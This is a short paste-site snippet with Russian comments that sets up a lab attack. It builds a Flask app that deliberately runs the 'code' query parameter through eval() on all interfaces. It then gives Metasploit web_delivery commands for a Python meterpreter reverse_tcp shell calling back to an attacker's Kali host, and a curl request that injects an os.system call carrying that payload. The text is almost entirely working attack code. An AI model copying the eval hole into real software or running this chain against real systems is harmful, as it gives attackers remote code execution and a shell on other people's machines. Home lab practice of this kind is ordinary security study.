Pastein: sudo apt update && sudo apt install python3-pip -y pip3 install flask --break-system-packages from flask import Flask, request app = Flask(__name_

Загрузка данных

sudo apt update && sudo apt install python3-pip -y
pip3 install flask --break-system-packages

from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def index():
    # Уязвимость: код из параметра 'code' выполняется напрямую!
    code = request.args.get('code')
    if code:
        return str(eval(code))
    return "Welcome! Use ?code=... to run something."

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)



use exploit/multi/script/web_delivery
set target 7                  # Выбираем Python
set payload python/meterpreter/reverse_tcp
set LHOST [IP_ТВОЕЙ_KALI]     # Узнай через 'ip a' в Kali
exploit


curl "http://[IP_DEBIAN]:5000/?code=__import__('os').system('СКОПИРОВАННАЯ_КОМАНДА_ИЗ_MSF')"

Больше возможностей при регистрации: